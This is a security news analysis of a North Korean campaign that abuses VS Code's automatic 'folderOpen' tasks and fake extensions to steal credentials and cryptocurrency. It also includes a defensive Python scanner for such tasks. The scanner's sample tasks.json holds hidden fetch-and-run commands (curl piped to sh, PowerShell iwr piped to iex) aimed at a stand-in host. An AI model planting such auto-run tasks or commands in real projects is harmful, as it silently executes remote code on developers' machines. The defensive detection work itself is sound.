North Korea Weaponizes VS Code to Hit Nearly 100 Orgs
Key insights
- Contagious Interview has abused VS Code's automatic tasks (a task in the repository's .vscode/tasks.json with runOptions.runOn set to "folderOpen") since December 2025 to execute malware the moment a project is opened.
- The UNK_DeadDrop campaign sent over 250 phishing emails in six weeks, targeting nearly 100 organizations across finance, crypto, education, and tech.
- One analysis attributed $12 million in cryptocurrency theft to North Korean operations in the first three months of 2026.
Why this matters
The folderOpen abuse turns a routine, daily developer action, opening a cloned repository in the editor, into an execution trigger. Defenses built around suspicious attachments or a user deliberately launching an executable never see it: the command is declared in a tasks.json file inside the repository and the editor itself starts it, so the editor's Workspace Trust decision is the only remaining gate. The breadth of sectors hit, spanning finance, cryptocurrency, education, and technology across ten countries, shows this is not a narrowly targeted espionage campaign but a wide-net financial extraction operation run at scale. Security teams at developer-heavy organizations need to treat third-party VS Code extensions, checked-in editor configuration, and GitHub-hosted project repositories as active threat surfaces, not just code-hosting conveniences.
Summary
North Korean hackers linked to the Contagious Interview group are systematically weaponizing developer tools, targeting nearly 100 organizations across finance, cryptocurrency, education, and technology in a campaign dubbed UNK_DeadDrop.
The infection chain opens with recruitment and code-review-themed emails pointing to actor-controlled GitHub repositories hosting malicious scripts. The technique that sets this campaign apart: abusing Microsoft Visual Studio Code's automatic tasks, a task in the repository's .vscode/tasks.json whose runOptions.runOn is set to "folderOpen", which the group has used since December 2025 to execute the payload the moment a developer opens the project folder in a trusted workspace. No suspicious attachment clicks required. Once inside, the attackers deploy VS Code extensions masquerading as Google services, enabling remote command execution, system reconnaissance, and credential and wallet data theft. The malware runs cross-platform on macOS, Linux, and Windows, with the open-source Go framework Overlord serving as part of the attack infrastructure.
In short, North Korea's Contagious Interview group, tracked in this campaign as UNK_DeadDrop, is running developer-targeted intrusions at scale across the U.S. and nine other countries, including the UK, Australia, France, and Germany.
- Over 250 phishing emails sent across a six-week window, with more than 75% of targets U.S.-based.
- One analysis cited theft of $12 million in cryptocurrency in the first three months of 2026 alone.
- Broader North Korean supply-chain escalation includes malicious npm packages and AI-assisted malware loader development.
The folderOpen abuse converts one of the most routine developer actions into an automatic compromise trigger, sidestepping conventional endpoint defenses that key on a user launching an executable or opening an attachment: the process that runs the payload is spawned by the editor's own task runner, driven by a configuration file that was checked into the repository.
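As an added example (my own code, not from the reporting or from any vendor tool named on this page), the following Python script shows what the folderOpen trigger looks like on disk and how to hunt for it across a checkout: it parses VS Code's JSONC-flavoured tasks.json (comments and trailing commas are permitted there, which strict JSON parsers reject), collects the default and per-OS commands of every task whose runOptions.runOn is "folderOpen", and flags tasks that hide their terminal output. The embedded tasks.json is constructed for illustration; its URLs use the reserved .invalid domain and are not indicators from the campaign.

```python
"""Flag VS Code tasks that run automatically when a folder is opened.

Added example: scans a checkout for .vscode/tasks.json files and reports
every task whose runOptions.runOn is "folderOpen", the trigger VS Code
fires as soon as a trusted folder is opened in the editor.
"""
import json
from pathlib import Path

# Constructed sample of a booby-trapped tasks.json (not a real indicator).
# The URLs use the reserved .invalid TLD; the commands are placeholders.
SAMPLE_TASKS_JSON = r'''{
  // tasks.json is JSONC: comments and trailing commas are allowed
  "version": "2.0.0",
  "tasks": [
    {
      "label": "prepare",
      "type": "shell",
      "command": "curl -fsSL https://updates.example.invalid/s.sh | sh",
      "windows": { "command": "powershell -c \"iwr https://updates.example.invalid/s.ps1 | iex\"" },
      "runOptions": { "runOn": "folderOpen" },
      "presentation": { "reveal": "never" },  /* keep the terminal hidden */
    },
    { "label": "build", "type": "shell", "command": "npm run build" },
  ],
}'''

OS_KEYS = ("windows", "osx", "linux")   # per-OS overrides allowed by the tasks schema


def _next_token(text: str, j: int) -> int:
    """Index of the first char at or after j that is not whitespace or a comment."""
    n = len(text)
    while j < n:
        if text[j].isspace():
            j += 1
        elif text.startswith("//", j):
            end = text.find("\n", j)
            j = n if end == -1 else end
        elif text.startswith("/*", j):
            end = text.find("*/", j + 2)
            j = n if end == -1 else end + 2
        else:
            break
    return j


def strip_jsonc(text: str) -> str:
    """Turn JSONC (comments, trailing commas) into strict JSON, string-aware."""
    out, i, n, in_str = [], 0, len(text), False
    while i < n:
        c = text[i]
        if in_str:                               # copy string bodies verbatim
            out.append(c)
            if c == "\\" and i + 1 < n:          # keep escapes such as \" intact
                out.append(text[i + 1])
                i += 1
            elif c == '"':
                in_str = False
            i += 1
        elif c == '"':
            in_str = True
            out.append(c)
            i += 1
        elif c == ",":                           # drop a comma that precedes } or ]
            j = _next_token(text, i + 1)
            if not (j < n and text[j] in "}]"):
                out.append(c)
            i += 1
        elif text.startswith("//", i) or text.startswith("/*", i):
            i = _next_token(text, i)             # skip the comment itself
        else:
            out.append(c)
            i += 1
    return "".join(out)


def _render(command, args) -> str:
    """Flatten a task command plus args; 'command' may be a {value, quoting} object."""
    parts = [command] + list(args or [])
    return " ".join(p.get("value", "") if isinstance(p, dict) else str(p) for p in parts)


def find_auto_tasks(tasks_json_text: str) -> list[dict]:
    """Return the tasks VS Code would start on folder open, with their commands."""
    doc = json.loads(strip_jsonc(tasks_json_text))
    hits = []
    for task in doc.get("tasks", []):
        if (task.get("runOptions") or {}).get("runOn") != "folderOpen":
            continue
        commands = {}                            # default command plus per-OS payloads
        if task.get("command") is not None:
            commands["default"] = _render(task["command"], task.get("args"))
        for os_key in OS_KEYS:
            override = task.get(os_key) or {}
            if override.get("command") is not None:
                commands[os_key] = _render(override["command"], override.get("args"))
        hits.append({
            "label": task.get("label"),
            "type": task.get("type"),
            "commands": commands,
            "hidden": (task.get("presentation") or {}).get("reveal") == "never",
        })
    return hits


def audit_repo(root: Path) -> list[tuple[str, list[dict]]]:
    """Scan every .vscode/tasks.json under root (nested folders included)."""
    findings = []
    for path in sorted(root.rglob("tasks.json")):
        if path.parent.name != ".vscode":
            continue
        try:
            hits = find_auto_tasks(path.read_text(encoding="utf-8", errors="replace"))
        except (ValueError, AttributeError, TypeError):
            hits = [{"label": None, "type": None, "commands": {}, "hidden": False,
                     "error": "unparseable tasks.json, review manually"}]
        if hits:
            findings.append((str(path.relative_to(root)), hits))
    return findings


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        for rel, hits in audit_repo(Path(sys.argv[1])):
            for h in hits:
                print(f"{rel}: task {h['label']!r} runs on folderOpen "
                      f"(hidden={h['hidden']}): {h['commands']}")
    else:
        for h in find_auto_tasks(SAMPLE_TASKS_JSON):
            print(f"sample: task {h['label']!r} runs on folderOpen "
                  f"(hidden={h['hidden']}): {h['commands']}")
```

Run it against a fresh clone before opening the folder in the editor, or wire audit_repo into a repository-intake review. On endpoints, setting "task.allowAutomaticTasks": "off" in the user settings.json stops VS Code from starting these tasks even in a trusted workspace, and leaving Workspace Trust enabled keeps them from running while a folder is still in restricted mode.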
Potential risks and opportunities
Risks
- Developers at finance and crypto firms who opened, and trusted, any GitHub-linked VS Code project from an unknown recruiter since December 2025 may have already triggered the folderOpen payload without any alert from controls keyed on attachments or manual execution.
- Microsoft faces pressure to restrict or redesign VS Code's automatic tasks. They are already gated behind Workspace Trust and the task.allowAutomaticTasks setting; a rushed further change could disrupt legitimate workspace-setup workflows (dependency installs, file watchers, devcontainer bootstraps) that large engineering teams rely on.
- AI-assisted malware loader development by Contagious Interview lowers the cost of campaign iteration, increasing the likelihood of rapid new variants before security vendors update signatures.
Opportunities
- Developer security vendors such as Socket, Snyk, and Endor Labs can position repository-level malware scanning as a direct countermeasure to the GitHub-hosted payload distribution chain used in UNK_DeadDrop.
- VS Code extension auditing and allowlisting tools gain clear budget justification at finance and crypto firms that appeared among the nearly 100 targeted organizations.
- Threat intelligence platforms with North Korea-linked IOC feeds can surface the disclosed C2 infrastructure as an active indicator, giving immediate detection value to SOC teams at the largely U.S.-based (over 75%) target pool.
What we don't know yet
- Whether the malicious VS Code extensions masquerading as Google services have been removed from the VS Code Marketplace or remain available as of June 2026.
- How many of the nearly 100 targeted organizations were successfully compromised versus merely phished -- the breach rate is not disclosed in public reporting.
- Which specific malware families beyond the Overlord Go framework were deployed, and whether any variants remain undetected on affected developer systems.
Originally reported by thehackernews.com
Original headline: North Korea's Contagious Interview Campaign Targeted 100 Organizations via VS Code, Cursor, and npm — $12M in Crypto Stolen, 26,584 Wallets Exfiltrated From Developer Systems